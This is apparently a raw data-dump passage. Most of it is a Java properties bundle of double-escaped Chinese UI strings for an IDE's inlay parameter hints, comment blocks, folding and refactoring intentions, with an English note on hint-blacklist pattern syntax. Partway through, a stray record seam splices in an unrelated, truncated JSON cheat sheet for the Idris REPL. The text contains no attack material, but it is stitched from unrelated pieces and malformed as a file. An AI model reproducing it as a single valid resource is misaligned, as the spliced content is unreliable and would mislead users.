\\u6210\\u5458\\u9ad8\\u4eae\\u663e\\u793a\njavadoc.error.resolving.url=\\u65e0\\u6cd5\\u89e3\\u6790\\u7f51\\u5740 {0}

\\u5728 project settings \\u4e2d\\u914d\\u7f6e API \\u6587\\u6863\\u53ef\\u80fd\\u4f1a\\u6709\\u5e2e\\u52a9\\u3002\n\ninlay.hints.show.settings=\\u7981\\u7528\\u65b9\\u6cd5 ''{0}'' \\u7684\\u63d0\\u793a\ninlay.hints.show.settings.description=\\u6253\\u5f00\\u53c2\\u6570\\u540d\\u79f0\\u63d0\\u793a\\u8bbe\\u7f6e\ninlay.hints.blacklist.method=\\u4e0d\\u663e\\u793a\\u5f53\\u524d\\u65b9\\u6cd5\\u7684\\u63d0\\u793a\ninlay.hints.blacklist.method.description=\\u5c06\\u5f53\\u524d\\u65b9\\u6cd5\\u6dfb\\u52a0\\u5230\\u53c2\\u6570\\u540d\\u79f0\\u63d0\\u793a\\u9ed1\\u540d\\u5355\ninlay.hints.intention.family.name=\\u53c2\\u6570\\u540d\\u79f0\\u63d0\\u793a\ninlay.hints.enable.action.text=\\u542f\\u7528\\u53c2\\u6570\\u540d\\u79f0\\u63d0\\u793a\ninlay.hints.disable.action.text=\\u7981\\u7528\\u63d0\\u793a\ninlay.hints.blacklist.pattern.explanation=To disable hints for a method, use the appropriate pattern:\n\njava.lang - methods from the java.lang package\njava.lang.*(*, *) - methods from the java.lang package with two parameters\n(*info) - single-parameter methods where the parameter name ends with info\n(key, value) - methods with parameters key and value\n*.put(key, value) - put methods with key and value parameters

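# A minimal sketch of how the blacklist patterns above match methods. The signatures below are
# hypothetical examples, not part of the original bundle; they assume the pattern syntax described
# in inlay.hints.blacklist.pattern.explanation.
#   void put(Object key, Object value)   -> matched by *.put(key, value)
#   void show(String info)               -> matched by (*info)
#   java.lang.Math.max(int a, int b)     -> matched by java.lang.*(*, *)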
\ninlay.hints.base.blacklist.description={0} \\u9ed8\\u8ba4\\u5e94\\u7528\\u9ed1\\u540d\\u5355\ninlay.hints.disable.custom.option=\\u7981\\u7528 ''{0}''\ninlay.hints.enable.custom.option=\\u542f\\u7528 ''{0}''\ninlay.hints.language.list.description=\\u4e3a\\u9879\\u76ee\\u4e2d\\u4f7f\\u7528\\u7684\\u7279\\u5b9a\\u8bed\\u8a00\\u914d\\u7f6e\\u5185\\u8054\\u63d0\\u793a\\u8bbe\\u7f6e\\u3002\n\nintention.extract.set.from.comparison.chain.family=\\u4ece\\u6bd4\\u8f83\\u94fe\\u4e2d\\u63d0\\u53d6\\u96c6\\u5408\nintention.extract.set.from.comparison.chain.duplicates={0} \\u68c0\\u6d4b\\u5230\\u8fd9\\u4e2a\\u7c7b\\u4e2d\\u7684 {1} \\u4e2a\\u4ee3\\u7801\\u7247\\u6bb5\\u53ef\\u4ee5\\u66ff\\u6362\\u4e3a\\u65b0\\u7684\\u521b\\u5efa\\u96c6\\u3002\\u4f60\\u60f3\\u66ff\\u6362\\u5b83{1,choice,1#|2#\\u4eec}\\u5417?\n\nblock.comment.intersects.existing.comment=\\u9009\\u4e2d\\u533a\\u57df\\u4e0e\\u73b0\\u6709\\u6ce8\\u91ca\\u76f8\\u4ea4\nblock.comment.wrapping.suffix=\\u9009\\u4e2d\\u533a\\u57df\\u5305\\u542b\\u5757\\u6ce8\\u91ca\\u540e\\u7f00\nblock.comment.nested.comment=\\u9009\\u4e2d\\u533a\\u57df\\u5305\\u542b\\u5757\\u6ce8\\u91ca\\uff0c\\n\\u5305\\u56f4\\u7684\\u8303\\u56f4\\u88ab\\u6ce8\\u91ca\\u3002\n\nintention.unroll.loop.family=\\u5c55\\u5f00\\u5faa\\u73af\n\nparameter.info.switch.overload.shortcuts=Switch \\u7528 {0} \\u6216 {1}\nparameter.info.switch.overload.shortcuts.single=Switch \\u7528 {0}\n\ncollapse.selection.existing.autogenerated.region=\\u65e0\\u6cd5\\u79fb\\u9664\\u81ea\\u52a8\\u751f\\u6210\\u7684\\u6298\\u53e0\\u533a\\u57df\ncollapse.selection.overlapping.warning.title=\\u6298\\u53e0\\u9009\\u62e9\ncollapse.selection.overlapping.warning.text=\\u5b58\\u5728\\u91cd\\u53e0\\u6298\\u53e0\\u533a\\u57df\ncollapse.selection.overlapping.warning.ok=\\u79fb\\u9664\ncollapse.selection.overlapping.warning.cancel=\\u53d6\\u6d88\n\nchange.uid.action.name=\\u968f\\u673a\\u66f4\\u6539 'serialVersionUID' \\u521d\\u59cb\\u5316\\u5668\n\nintention.convert.to.single.return.name=\\u5c06\\u4e3b\\u4f53\\u8f6c\\u6362\\u4e3a\\u5355\\u4e2a\\u9000\\u51fa\\u70b9\\u5f62\\u5f0f"} {"text": "{\n \"id\": \"idris_repl_cheat_sheet\",\n \"name\": \"Idris REPL\",\n \"description\": \"Basic commands for the Idris REPL\",\n \"metadata\": {\n \"sourceName\": \"Idris-Lang\",\n \"sourceUrl\": \"http://www.idris-lang.org\"\n },\n \"template_type\": \"terminal\",\n \"section_order\": [\n \"From the Prompt\",\n \"Documentation and Searching\",\n \"Changing Settings\",\n \"Displaying Information\",\n \"Advanced Usage\"\n ],\n \"sections\": {\n \"From the Prompt\": [\n {\n \"key\": \"\",\n \"val\": \"Evaluate an expression.\"\n },\n {\n \"key\": \":t, :type\",\n \"val\": \"Check the type of an expression.\"\n },\n {\n \"key\": \":q, :quit\",\n \"val\": \"Exit the Idris system\"\n },\n {\n \"key\": \":w, :warranty\",\n \"val\": \"Displays warranty information\"\n },\n {\n \"key\": \":?, :h, :help\",\n \"val\": \"Display this help text\"\n },\n {\n \"key\": \":pp, :pprint